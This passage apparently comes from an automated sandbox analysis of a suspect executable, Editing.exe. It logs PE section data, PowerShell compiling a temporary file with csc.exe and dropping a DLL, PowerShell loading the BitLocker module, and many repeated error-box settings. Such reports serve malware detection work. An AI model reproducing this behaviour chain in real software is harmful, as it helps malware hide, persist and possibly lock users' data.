Source: Editing.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Editing.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"Jump to behavior
Source: Editing.exeStatic PE information: section name: .CLR_UEF
Source: Editing.exeStatic PE information: section name: .didat
Source: Editing.exeStatic PE information: section name: Section
Source: Editing.exeStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\ Editing.exeCode function: 0_2_00007FF5E72154CC push ebp; ret 0_2_00007FF5E72154D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342BFC75 pushad ; retf 2_2_00007FFD342BFC77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342BD2A5 pushad ; iretd 2_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D00BD pushad ; iretd 2_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344A2316 push 8B485F92h; iretd 2_2_00007FFD344A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344A5F18 pushad ; ret 2_2_00007FFD344A5F19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B00BD pushad ; iretd 4_2_00007FFD343B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B1A69 push ds; retf 4_2_00007FFD343B1A6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B1049 pushad ; retf 4_2_00007FFD343B105A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B105B pushad ; retf 4_2_00007FFD343B105A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\ Editing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
